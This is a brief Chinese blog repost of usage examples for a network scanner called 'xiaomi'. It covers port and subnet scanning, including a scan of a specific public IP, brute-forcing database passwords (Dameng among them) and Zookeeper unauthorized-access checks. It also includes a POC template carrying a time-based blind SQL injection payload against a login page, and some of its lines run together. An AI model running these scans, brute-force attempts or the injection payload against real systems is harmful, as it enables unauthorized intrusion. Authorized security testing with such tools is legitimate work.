./xiaomi --web --web-port 8787 --web-load .res.txt


./xiaomi --web --web-port 8787 -h 127.0.0.1 # 可使用hf,其他参数直接加在后面即可


./xiaomi -h 192.168.1.0/24 -prand
./xiaomi -h 192.168.1.1 -p 22,80,443,3306 -prand
国产数据库密码爆破:达梦zookeeper未授权检测
3307 → MySQL14333 → MSSQL2222 → SSH6378 → Redis
./xiaomi -h 112.5.57.79 -encrypt

./xiaomi -dd .res.txt

name: poc-login-sqlrules: - method: POST path: /web/login headers: Content-Type: application/x-www-form-urlencoded follow_redirects: true body: "user_name=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))x) AND '1'='1&language=0" expression: response.delay(5) && response.status == 200
本文链接:https://www.kinber.cn/post/5931.html 转载需授权!
推荐本站淘宝优惠价购买喜欢的宝贝:

支付宝微信扫一扫,打赏作者吧~
